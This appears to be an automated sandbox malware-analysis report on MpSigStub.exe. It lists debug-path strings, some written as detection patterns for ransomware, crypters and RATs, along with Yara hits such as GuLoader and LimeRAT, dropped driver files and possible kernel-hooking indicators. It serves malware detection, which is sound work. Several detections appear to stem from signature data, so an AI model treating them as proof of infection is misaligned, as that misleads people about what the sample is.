Source:	Binary string: \SSFK\Release\SSFK.pdb source: MpSigStub.exe, 00000024.00000003.6352999953.00000197A3469000.00000004.00000001.sdmp
Source:	Binary string: $\SuperLight\release\MfcDllServer.pdb source: MpSigStub.exe, 00000024.00000003.6348335236.00000197A3259000.00000004.00000001.sdmp
Source:	Binary string: Release\adviser.pdb source: MpSigStub.exe, 00000024.00000003.6337394565.00000197A4314000.00000004.00000001.sdmp
Source:	Binary string: <7\\Project's\\xCrypt3r\\stub_crypter\\Release\\stub.pdb source: MpSigStub.exe, 00000024.00000003.6431842764.00000197A4D63000.00000004.00000001.sdmp
Source:	Binary string: JJDownLoader\Bin\JJDownLoader_a.pdb source: MpSigStub.exe, 00000024.00000003.6303526002.00000197A34ED000.00000004.00000001.sdmp
Source:	Binary string: iashlpr.pdb source: MpSigStub.exe, 00000024.00000003.6321480698.00000197A3B3E000.00000004.00000001.sdmp
Source:	Binary string: \tutorial\Release\CoffeeShop6.pdb source: MpSigStub.exe, 00000024.00000003.6289251468.00000197A3F1F000.00000004.00000001.sdmp
Source:	Binary string: .C:\source\src\nssm\out\Release\win64\absrv.pdb source: MpSigStub.exe, 00000024.00000003.6312003576.00000197A3DD5000.00000004.00000001.sdmp
Source:	Binary string: \\fishmaster\\x64\\Release\\fishmaster\.pdb source: MpSigStub.exe, 00000024.00000003.6309767237.00000197A3869000.00000004.00000001.sdmp
Source:	Binary string: advapi32.pdb source: WerFault.exe, 00000005.00000003.2857984455.000000000543A000.00000004.00000001.sdmp, WerFault.exe, 00000009.00000003.2962082422.00000000051D9000.00000004.00000040.sdmp, MpSigStub.exe, 00000024.00000003.6294257169.00000197A398C000.00000004.00000001.sdmp
Source:	Binary string: ZAService.pdb source: MpSigStub.exe, 00000024.00000003.6324198203.00000197A492C000.00000004.00000001.sdmp
Source:	Binary string: gMolq.pdb source: MpSigStub.exe, 00000024.00000003.6349678928.00000197A3C89000.00000004.00000001.sdmp
Source:	Binary string: O&\\wininet_fr_20200212\\.+\\?dlln\.pdb source: MpSigStub.exe, 00000024.00000003.6350622822.00000197A3F60000.00000004.00000001.sdmp
Source:	Binary string: rafotech\minisoft\tools\xyfa\Release\xyfa.pdb source: MpSigStub.exe, 00000024.00000003.6291492327.00000197A37E5000.00000004.00000001.sdmp
Source:	Binary string: fk_drv.pdb] source: MpSigStub.exe, 00000024.00000003.6436377560.00000197A4C85000.00000004.00000001.sdmp
Source:	Binary string: RamMap.pdb source: MpSigStub.exe, 00000024.00000003.6339573341.00000197A3E6C000.00000004.00000001.sdmp
Source:	Binary string: C:\src\similar\clients\our\new_bundler\nsis_plugins\plugins\safed.pdbxm source: MpSigStub.exe, 00000024.00000003.6288538370.00000197A46DA000.00000004.00000001.sdmp
Source:	Binary string: c:\\Injekt - Builds\\.*\\SpeedBrowserP\\Source\\shortcut\\Encoder\\obj\\Release\\shortcut.pdb source: MpSigStub.exe, 00000024.00000003.6280960340.00000197A4381000.00000004.00000001.sdmp
Source:	Binary string: CoreMessaging.pdb v source: WerFault.exe, 00000005.00000003.2881840222.00000000049A9000.00000004.00000040.sdmp
Source:	Binary string: 8rise\Window\position\Character\opposite\Miss\lawCome.pdb source: MpSigStub.exe, 00000024.00000003.6437415503.00000197A38EC000.00000004.00000001.sdmp
Source:	Binary string: aeroadmin.pdb source: MpSigStub.exe, 00000024.00000003.6324198203.00000197A492C000.00000004.00000001.sdmp
Source:	Binary string: rpcss.pdb source: MpSigStub.exe, 00000024.00000003.6315850680.00000197A403E000.00000004.00000001.sdmp
Source:	Binary string: \Rasomware2.0.pdb source: MpSigStub.exe, 00000024.00000003.6437415503.00000197A38EC000.00000004.00000001.sdmp
Source:	Binary string: You\Above\Particular\Exception.pdb source: MpSigStub.exe, 00000024.00000003.6312336240.00000197A3E16000.00000004.00000001.sdmp
Source:	Binary string: \down\Wing\Would.pdb source: MpSigStub.exe, 00000024.00000003.6271076584.00000197A3A37000.00000004.00000001.sdmp
Source:	Binary string: bcryptprimitives.pdb( source: WerFault.exe, 00000005.00000003.2859705734.00000000054F2000.00000004.00000001.sdmp, WerFault.exe, 00000009.00000003.2920656846.000000000613C000.00000004.00000001.sdmp
Source:	Binary string: mafia2injector\Release\MafiaInjector.pdb source: MpSigStub.exe, 00000024.00000003.6330297949.00000197A369B000.00000004.00000001.sdmp
Source:	Binary string: \\aes_mfc\\Release\\aes_mfc.pdb source: MpSigStub.exe, 00000024.00000003.6288205941.00000197A4D62000.00000004.00000001.sdmp
Source:	Binary string: m3KHLMcF.pdb source: MpSigStub.exe, 00000024.00000003.6428495405.00000197A2E93000.00000004.00000001.sdmp
Source:	Binary string: sdmf\|er.pdb source: MpSigStub.exe, 00000024.00000003.6435320664.00000197A4AB7000.00000004.00000001.sdmp
Source:	Binary string: Release\haozip.chs\bin\Win32\release\pdb\HaoZip7zSetup.pdb source: MpSigStub.exe, 00000024.00000003.6327908307.00000197A40EC000.00000004.00000001.sdmp
Source:	Binary string: \Release\TKCodeDDoS.pdb source: MpSigStub.exe, 00000024.00000003.6289251468.00000197A3F1F000.00000004.00000001.sdmp
Source:	Binary string: CrossLoopService.pdb source: MpSigStub.exe, 00000024.00000003.6324198203.00000197A492C000.00000004.00000001.sdmp
Source:	Binary string: F:\Projects\WebInject\bin\x86\Release_logged\payload32.pdb source: MpSigStub.exe, 00000024.00000003.6440763384.00000197A4E29000.00000004.00000001.sdmp
Source:	Binary string: \Release\winsrcsrv.pdb source: MpSigStub.exe, 00000024.00000003.6327908307.00000197A40EC000.00000004.00000001.sdmp
Source:	Binary string: ws2_32.pdb source: WerFault.exe, 00000005.00000003.2862263906.0000000005519000.00000004.00000001.sdmp, WerFault.exe, 00000009.00000003.2962082422.00000000051D9000.00000004.00000040.sdmp
Source:	Binary string: hcd:\\MODULOS\\PROJETO BATMAN\\Loaders\\Loader C# Crypter .* LINK .*\\obj\\x86\\Debug\\golfzinho.pdb source: MpSigStub.exe, 00000024.00000003.6439967654.00000197A4446000.00000004.00000001.sdmp
Source:	Binary string: ir41_qcx.pdb source: MpSigStub.exe, 00000024.00000003.6321480698.00000197A3B3E000.00000004.00000001.sdmp
Source:	Binary string: G\SharedSerialization\obj\Release\netstandard2.0\SharedSerialization.pdb source: MpSigStub.exe, 00000024.00000003.6274276311.00000197A2E51000.00000004.00000001.sdmp
Source:	Binary string: dbmsrpcn.pdb source: MpSigStub.exe, 00000024.00000003.6289251468.00000197A3F1F000.00000004.00000001.sdmp
Source:	Binary string: irprops.pdbj source: MpSigStub.exe, 00000024.00000003.6317535190.00000197A4F30000.00000004.00000001.sdmp
Source:	Binary string: mciole32.pdb source: MpSigStub.exe, 00000024.00000003.6332905468.00000197A3592000.00000004.00000001.sdmp
Source:	Binary string: Deamon-dll.*\\Release\\Deamon-dll\.pdb source: MpSigStub.exe, 00000024.00000003.6350622822.00000197A3F60000.00000004.00000001.sdmp
Source:	Binary string: termsrv.pdbaA source: MpSigStub.exe, 00000024.00000003.6340102815.00000197A329B000.00000004.00000001.sdmp
Source:	Binary string: msimg32.pdb] source: MpSigStub.exe, 00000024.00000003.6429813058.00000197A4697000.00000004.00000001.sdmp
Source:	Binary string: Pb730.pdb source: MpSigStub.exe, 00000024.00000003.6428495405.00000197A2E93000.00000004.00000001.sdmp
Source:	Binary string: mqutil.pdb source: MpSigStub.exe, 00000024.00000003.6313066347.00000197A4615000.00000004.00000001.sdmp
Source:	Binary string: \Release\NvBackend.pdbx source: MpSigStub.exe, 00000024.00000003.6315850680.00000197A403E000.00000004.00000001.sdmp
Source:	Binary string: ReleaseDebug\TvServer.pdb source: MpSigStub.exe, 00000024.00000003.6288538370.00000197A46DA000.00000004.00000001.sdmp
Source:	Binary string: \Release\kugou.pdb source: MpSigStub.exe, 00000024.00000003.6437789522.00000197A392D000.00000004.00000001.sdmp
Source:	Binary string: usp10.pdbj source: MpSigStub.exe, 00000024.00000003.6323790490.00000197A4866000.00000004.00000001.sdmp
Source:	Binary string: mstscax.pdb source: MpSigStub.exe, 00000024.00000003.6293664511.00000197A3192000.00000004.00000001.sdmp
Source:	Binary string: wwin32u.pdb( source: WerFault.exe, 00000005.00000003.2855890772.000000000299F000.00000004.00000001.sdmp, WerFault.exe, 00000009.00000003.2918220694.00000000030AA000.00000004.00000001.sdmp
Source:	Binary string: \output\MinSizeRel\updrem.pdb source: MpSigStub.exe, 00000024.00000003.6323790490.00000197A4866000.00000004.00000001.sdmp
Source:	Binary string: \Disable_Windowsupdate.pdbaG source: MpSigStub.exe, 00000024.00000003.6340102815.00000197A329B000.00000004.00000001.sdmp
Source:	Binary string: wwin32u.pdb0 source: WerFault.exe, 00000009.00000003.2962036020.00000000051D2000.00000004.00000040.sdmp
Source:	Binary string: \SupNewTab\bin\SupTab.pdb source: MpSigStub.exe, 00000024.00000003.6352999953.00000197A3469000.00000004.00000001.sdmp
Source:	Binary string: "SimCorp.XMGRs.Testing.ApiTests.pdb source: MpSigStub.exe, 00000024.00000003.6348335236.00000197A3259000.00000004.00000001.sdmp
Source:	Binary string: uigjhghio.pdb source: MpSigStub.exe, 00000024.00000003.6428495405.00000197A2E93000.00000004.00000001.sdmp
Source:	Binary string: tixati.pdb source: MpSigStub.exe, 00000024.00000003.6348335236.00000197A3259000.00000004.00000001.sdmp
Source:	Binary string: \i386\iSafeNetFilter.pdb source: MpSigStub.exe, 00000024.00000003.6332642975.00000197A3551000.00000004.00000001.sdmp
Source:	Binary string: schtasks.pdbd*Microsoft Corporation source: MpSigStub.exe, 00000024.00000003.6277859035.00000197A392F000.00000004.00000001.sdmp
Source:	Binary string: c:\mpengine.obj.x86fre\amcore\mpengine\mavutils\source\sigutils\vfilesystem\files\winver\objfre\i386\winver.pdb source: MpSigStub.exe, 00000024.00000003.6340102815.00000197A329B000.00000004.00000001.sdmp
Source:	Binary string: Amon\Current\nethfdrv\Production\netupdsrv.pdb source: MpSigStub.exe, 00000024.00000003.6277246842.00000197A454F000.00000004.00000001.sdmp
Source:	Binary string: .+:\\Projects\\tidynet\\Release\\(selfdestruct\|tidynetwork).pdb source: MpSigStub.exe, 00000024.00000003.6437085765.00000197A4B7D000.00000004.00000001.sdmp
Source:	Binary string: combase.pdb source: WerFault.exe, 00000005.00000003.2858586114.00000000029CB000.00000004.00000001.sdmp, WerFault.exe, 00000009.00000003.2962082422.00000000051D9000.00000004.00000040.sdmp
Source:	Binary string: hide_evr2.pdb source: MpSigStub.exe, 00000024.00000003.6435742963.00000197A3D91000.00000004.00000001.sdmp
Source:	Binary string: SKRFM.pdb source: MpSigStub.exe, 00000024.00000003.6428495405.00000197A2E93000.00000004.00000001.sdmp
Source:	Binary string: I \\aes_mfc\\Release\\aes_mfc.pdb source: MpSigStub.exe, 00000024.00000003.6288205941.00000197A4D62000.00000004.00000001.sdmp
Source:	Binary string: appmgmts.pdb source: MpSigStub.exe, 00000024.00000003.6338261504.00000197A4590000.00000004.00000001.sdmp
Source:	Binary string: \src\out\Release\cleaner.pdb source: MpSigStub.exe, 00000024.00000003.6345553259.00000197A36F1000.00000004.00000001.sdmp
Source:	Binary string: apphelp.pdbz~ source: WerFault.exe, 00000005.00000003.2881791538.00000000049A2000.00000004.00000040.sdmp
Source:	Binary string: \chrome-toolbox\trunk\src\plugin\apihook.pdb source: MpSigStub.exe, 00000024.00000003.6316460209.00000197A40AB000.00000004.00000001.sdmp
Source:	Binary string: DownExecute.pdb source: MpSigStub.exe, 00000024.00000003.6439967654.00000197A4446000.00000004.00000001.sdmp
Source:	Binary string: F:\Projects\MiniSword\MakeSword\MakeSword\obj\Debug\MakeSword.pdb source: MpSigStub.exe, 00000024.00000003.6325389459.00000197A496F000.00000004.00000001.sdmp
Source:	Binary string: \CoronaVirus Status.pdb source: MpSigStub.exe, 00000024.00000003.6294257169.00000197A398C000.00000004.00000001.sdmp
Source:	Binary string: \svr_d\server_lyl\WinSAP\winSAP_2\Release\winSAP_2.pdb source: MpSigStub.exe, 00000024.00000003.6291492327.00000197A37E5000.00000004.00000001.sdmp
Source:	Binary string: I \\Projects\\dll.\\.+\\dll.\.pdb source: MpSigStub.exe, 00000024.00000003.6288205941.00000197A4D62000.00000004.00000001.sdmp
Source:	Binary string: 'c:\Top\Train\job\Wall\Did\Spendkept.pdb] source: MpSigStub.exe, 00000024.00000003.6428495405.00000197A2E93000.00000004.00000001.sdmp
Source:	Binary string: d:\pavbld\amcore\MpEngine\mavutils\Source\sigutils\vdlls\Microsoft.NET\VFramework\Windows\Windows.pdb source: MpSigStub.exe, 00000024.00000003.6312663720.00000197A3E58000.00000004.00000001.sdmp
Source:	Binary string: 2 Ransom:MSIL/Cryptolocker.PDB!MTB source: MpSigStub.exe, 00000024.00000003.6438683964.00000197A371E000.00000004.00000001.sdmp
Source:	Binary string: wgdi32full.pdb( source: WerFault.exe, 00000005.00000003.2856914789.00000000029AA000.00000004.00000001.sdmp, WerFault.exe, 00000009.00000003.2918319280.00000000030B5000.00000004.00000001.sdmp
Source:	Binary string: GC:\Users\wizzlabs\source\repos\SaveJuin\Nuigi\obj\Release\Baddelima.pdb source: MpSigStub.exe, 00000024.00000003.6291090515.00000197A33E4000.00000004.00000001.sdmp
Source:	Binary string: wpnpinst.pdb source: MpSigStub.exe, 00000024.00000003.6351148277.00000197A49F2000.00000004.00000001.sdmp
Source:	Binary string: adptif.pdb source: MpSigStub.exe, 00000024.00000003.6342863444.00000197A4F72000.00000004.00000001.sdmp
Source:	Binary string: shell32.pdb( source: WerFault.exe, 00000005.00000003.2871629055.0000000005FF0000.00000004.00000001.sdmp, WerFault.exe, 00000009.00000003.2940537649.0000000006800000.00000004.00000001.sdmp
Source:	Binary string: 0Z:\NewProjects\hotsend\Release-Win32\hotsend.pdb source: MpSigStub.exe, 00000024.00000003.6294257169.00000197A398C000.00000004.00000001.sdmp
Source:	Binary string: D:\\MyCode\\riot.?\\encryptor.+\.pdb source: MpSigStub.exe, 00000024.00000003.6288205941.00000197A4D62000.00000004.00000001.sdmp
Source:	Binary string: <tmp\x86-Public-Game\LoL\RiotLoL_Client\League of Legends.pdba source: MpSigStub.exe, 00000024.00000003.6320871262.00000197A4180000.00000004.00000001.sdmp
Source:	Binary string: \x64\Release\SFKEX64.pdb source: MpSigStub.exe, 00000024.00000003.6352999953.00000197A3469000.00000004.00000001.sdmp
Source:	Binary string: @g-e3e_2qalAN+/PaKV/J.pdb source: MpSigStub.exe, 00000024.00000003.6428495405.00000197A2E93000.00000004.00000001.sdmp
Source:	Binary string: .+:.*\\obfuscator\\SkypeBot.pdb source: MpSigStub.exe, 00000024.00000003.6330297949.00000197A369B000.00000004.00000001.sdmp
Source:	Binary string: D:\DevPatch\_FINAL\Bin\MapleStory.pdb source: MpSigStub.exe, 00000024.00000003.6323790490.00000197A4866000.00000004.00000001.sdmp
Source:	Binary string: !kpdfcore\obj\Release\kpdfcore.pdb source: MpSigStub.exe, 00000024.00000003.6319165087.00000197A48CC000.00000004.00000001.sdmp
Source:	Binary string: \x86\Release\swhost.pdb source: MpSigStub.exe, 00000024.00000003.6438240606.00000197A36DD000.00000004.00000001.sdmp
Source:	Binary string: T:\TFS-TradeProject\PDB\Release\TT-Miner.pdb source: MpSigStub.exe, 00000024.00000003.6274276311.00000197A2E51000.00000004.00000001.sdmp
Source:	Binary string: ColorAdapterClient.pdb_ source: WerFault.exe, 00000005.00000003.2881840222.00000000049A9000.00000004.00000040.sdmp, WerFault.exe, 00000009.00000003.2962082422.00000000051D9000.00000004.00000040.sdmp
Source:	Binary string: \ggg\build\Release_32\libglib-2.0-0.pdb source: MpSigStub.exe, 00000024.00000003.6291492327.00000197A37E5000.00000004.00000001.sdmp
Source:	Binary string: winmm.pdb( source: WerFault.exe, 00000005.00000003.2867958471.000000000605C000.00000004.00000001.sdmp, WerFault.exe, 00000009.00000003.2943062452.000000000686C000.00000004.00000001.sdmp
Source:	Binary string: cmd.pdb source: MpSigStub.exe, 00000024.00000003.6269788057.00000197A4C44000.00000004.00000001.sdmp
Source:	Binary string: d+D:\tortoiseSVN\nsc5\bin\Release\nssock2.pdbd source: MpSigStub.exe, 00000024.00000003.6430342028.00000197A4BC0000.00000004.00000001.sdmp
Source:	Binary string: x:\Dev_CPP\Work\VS_KnzStr_Adware\Release\VS_Work1.pdb source: MpSigStub.exe, 00000024.00000003.6318199174.00000197A3059000.00000004.00000001.sdmp
Source:	Binary string: er.pdb source: MpSigStub.exe, 00000024.00000003.6338261504.00000197A4590000.00000004.00000001.sdmp
Source:	Binary string: Sniffer\Release\Sniffer.pdbxS source: MpSigStub.exe, 00000024.00000003.6349678928.00000197A3C89000.00000004.00000001.sdmp
Source:	Binary string: diskpart.pdb source: MpSigStub.exe, 00000024.00000003.6331200392.00000197A38EC000.00000004.00000001.sdmp
Source:	Binary string: F:\Projects\WebInject\bin\x64\Release_logged\webinject64.pdb source: MpSigStub.exe, 00000024.00000003.6428495405.00000197A2E93000.00000004.00000001.sdmp
Source:	Binary string: "E:\DLMon5\drv\obj\i386\RioDrvs.pdba source: MpSigStub.exe, 00000024.00000003.6438683964.00000197A371E000.00000004.00000001.sdmp
Source:	Binary string: wship6.pdb3 source: MpSigStub.exe, 00000024.00000003.6291492327.00000197A37E5000.00000004.00000001.sdmp
Source:	Binary string: d:\build.obj.x86fre\amcore\mpengine\mavutils\source\sigutils\vfilesystem\files\logoff\objfre\i386\logoff.pdb source: MpSigStub.exe, 00000024.00000003.6415513577.00000197A3D91000.00000004.00000001.sdmp
Source:	Binary string: 8rise\Window\position\Character\opposite\Miss\lawCome.pdb~ source: MpSigStub.exe, 00000024.00000003.6437415503.00000197A38EC000.00000004.00000001.sdmp
Source:	Binary string: Seed\trunk\output\bin\ntsvc.pdbxO source: MpSigStub.exe, 00000024.00000003.6282020026.00000197A450D000.00000004.00000001.sdmp
Source:	Binary string: \\Projects\\dll.\\.+\\dll.\.pdb source: MpSigStub.exe, 00000024.00000003.6288205941.00000197A4D62000.00000004.00000001.sdmp
Source:	Binary string: 2branches\xiaoyuTrunk\bin\Release\Win32\Upgrade.pdb source: MpSigStub.exe, 00000024.00000003.6341224894.00000197A35D4000.00000004.00000001.sdmp
Source:	Binary string: api-ms-win-security-base-l1-1-0.pdb source: MpSigStub.exe, 00000024.00000003.6303130875.00000197A4DA4000.00000004.00000001.sdmp
Source:	Binary string: \\Project's\\xCrypt3r\\stub_crypter\\Release\\stub.pdb source: MpSigStub.exe, 00000024.00000003.6431842764.00000197A4D63000.00000004.00000001.sdmp
Source:	Binary string: 9C:\Users\Seman\source\repos\Triforce\Release\Triforce.pdb source: MpSigStub.exe, 00000024.00000003.6320871262.00000197A4180000.00000004.00000001.sdmp
Source:	Binary string: X:\\DEgELgPMENT\\VC\+\+\\CrgptorgEvolugionggld\\relgase\\m.pdb source: MpSigStub.exe, 00000024.00000003.6430077076.00000197A46D9000.00000004.00000001.sdmp
Source:	Binary string: FDM3\bin\Release\FdmBrowserHelper.pdb source: MpSigStub.exe, 00000024.00000003.6330297949.00000197A369B000.00000004.00000001.sdmp
Source:	Binary string: dsget.pdb source: MpSigStub.exe, 00000024.00000003.6317535190.00000197A4F30000.00000004.00000001.sdmp
Source:	Binary string: wmidx.pdbj source: MpSigStub.exe, 00000024.00000003.6279581351.00000197A4A76000.00000004.00000001.sdmp
Source:	Binary string: ramaint.pdb source: MpSigStub.exe, 00000024.00000003.6324198203.00000197A492C000.00000004.00000001.sdmp
Source:	Binary string: \Release\initialexe\torch.exe.pdbxE source: MpSigStub.exe, 00000024.00000003.6348335236.00000197A3259000.00000004.00000001.sdmp
Source:	Binary string: d:\Projects\AKL\kh\Release\kh.pdb source: MpSigStub.exe, 00000024.00000003.6321843775.00000197A2FD4000.00000004.00000001.sdmp
Source:	Binary string: C:\Users\MARIO\source\repos\ENCRIPTAR\x64\Release\ENCRIPTAR.pdb source: MpSigStub.exe, 00000024.00000003.6430077076.00000197A46D9000.00000004.00000001.sdmp
Source:	Binary string: .:\GIT\addonInstaller\instui\Release\instui.pdb source: MpSigStub.exe, 00000024.00000003.6283020613.00000197A471D000.00000004.00000001.sdmp
Source:	Binary string: \RocketTabInstaller\Release\Installer.pdb. source: MpSigStub.exe, 00000024.00000003.6284057981.00000197A47A0000.00000004.00000001.sdmp
Source:	Binary string: \\finalpro\\forlsa\\Win32Project.*\\Win32Project.+\.pdb source: MpSigStub.exe, 00000024.00000003.6303735122.00000197A3500000.00000004.00000001.sdmp
Source:	Binary string: ,ByShell_Up19\DarkShell\Release\DarkShell.pdb source: MpSigStub.exe, 00000024.00000003.6431842764.00000197A4D63000.00000004.00000001.sdmp
Source:	Binary string: ZohoTray.pdb source: MpSigStub.exe, 00000024.00000003.6324198203.00000197A492C000.00000004.00000001.sdmp

Data Obfuscation:

Yara detected GuLoader

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR

Yara detected MaliciousMacro

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR

Yara detected Costura Assembly Loader

Show sources

Source: Yara match	File source: 36.3.MpSigStub.exe.197a4fb9462.85.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.3.MpSigStub.exe.197a36a8ae6.146.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.3.MpSigStub.exe.197a36a8ae6.146.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.3.MpSigStub.exe.197a497a30f.132.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000024.00000003.6269788057.00000197A4C44000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000003.6355645936.00000197A4C44000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000003.6285143119.00000197A4C44000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000003.6330297949.00000197A369B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000003.6340905094.00000197A4C44000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000003.6334441396.00000197A4C44000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000003.6301296808.00000197A4FB5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR

Yara detected AllatoriJARObfuscator

Show sources

Source: Yara match	File source: 36.3.MpSigStub.exe.197a31af2c4.73.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.3.MpSigStub.exe.197a31af2c4.167.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.3.MpSigStub.exe.197a31aed77.165.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.3.MpSigStub.exe.197a31ae82a.166.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.3.MpSigStub.exe.197a31aed77.74.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.3.MpSigStub.exe.197a31ae82a.75.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000024.00000003.6293943264.00000197A31B6000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000003.6336234827.00000197A31B6000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000003.6301822800.00000197A4E6B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000003.6273475176.00000197A3D51000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR

Yara detected MSILLoadEncryptedAssembly

Show sources

Source: Yara match	File source: 00000024.00000003.6273475176.00000197A3D51000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR

Yara detected VB6 Downloader Generic

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR

Yara detected BatToExe compiled binary

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR

Binary or sample is protected by dotNetProtector

Show sources

Source: MpSigStub.exe, 00000024.00000003.6323451282.00000197A3C46000.00000004.00000001.sdmp	String found in binary or memory: HSTR:MSIL/PvLogiciels.dotNetProtector.A
Source: MpSigStub.exe, 00000024.00000003.6343232049.00000197A3FA3000.00000004.00000001.sdmp	String found in binary or memory: PvLogiciels.dotNetProtector
Source: MpSigStub.exe, 00000024.00000003.6343232049.00000197A3FA3000.00000004.00000001.sdmp	String found in binary or memory: <dotNetProtector>
Source: MpSigStub.exe, 00000024.00000003.6289251468.00000197A3F1F000.00000004.00000001.sdmp	String found in binary or memory: !#HSTR:MSIL/PvLogiciels.dotNetProtector.A
Source: MpSigStub.exe, 00000024.00000003.6289251468.00000197A3F1F000.00000004.00000001.sdmp	String found in binary or memory: PvLogiciels.dotNetProtector.Runtime
Source: MpSigStub.exe, 00000024.00000003.6289251468.00000197A3F1F000.00000004.00000001.sdmp	String found in binary or memory: <dotNetProtector>x

Source: ConfigSecurityPolicy.exe.45.dr

Static PE information: 0x6D96FD94 [Thu Apr 6 05:31:00 2028 UTC]

Source: MpCmdRun.exe.45.dr	Static PE information: section name: .didat
Source: NisSrv.exe.45.dr	Static PE information: section name: .didat
Source: MpCmdRun.exe0.45.dr	Static PE information: section name: .didat
Source: MpClient.dll.45.dr	Static PE information: section name: .didat
Source: MpCommu.dll.45.dr	Static PE information: section name: .didat
Source: MpRtp.dll.45.dr	Static PE information: section name: .didat
Source: MpSvc.dll.45.dr	Static PE information: section name: .didat
Source: ProtectionManagement.dll.45.dr	Static PE information: section name: .didat
Source: MpClient.dll0.45.dr	Static PE information: section name: .didat

Source: mpavbase.vdm.36.dr	Static PE information: real checksum: 0x354a210 should be:
Source: mpasbase.vdm.36.dr	Static PE information: real checksum: 0x329e303 should be:

Persistence and Installation Behavior:

Yara detected Neshta

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR

Sample is not signed and drops a device driver

Show sources

Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe	File created: C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\Drivers\WdBoot.sys	Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe	File created: C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\Drivers\WdDevFlt.sys	Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe	File created: C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\Drivers\WdFilter.sys	Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe	File created: C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\Drivers\WdNisDrv.sys	Jump to behavior

Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-5e107659.exe	File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\9B256797-6DAD-4B73-B8E9-EA48023428D4\mpasdlta.vdm	Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-5e107659.exe	File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\9B256797-6DAD-4B73-B8E9-EA48023428D4\mpavdlta.vdm	Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\9B256797-6DAD-4B73-B8E9-EA48023428D4\MpSigStub.exe	File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\9B256797-6DAD-4B73-B8E9-EA48023428D4\mpasbase.vdm	Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\9B256797-6DAD-4B73-B8E9-EA48023428D4\MpSigStub.exe	File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\9B256797-6DAD-4B73-B8E9-EA48023428D4\mpavbase.vdm	Jump to dropped file

Boot Survival:

Yara detected Neshta

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR

Yara detected LimeRAT

Show sources

Source: Yara match	File source: 00000024.00000003.6437415503.00000197A38EC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000003.6438683964.00000197A371E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR

Hooking and other Techniques for Hiding and Protection:

May modify the system service descriptor table (often done to hook functions)

Show sources

Source: MpSigStub.exe, 00000024.00000003.6291090515.00000197A33E4000.00000004.00000001.sdmp

Binary or memory string: KeServiceDescriptorTable

Contains functionality to hide user accounts

Show sources

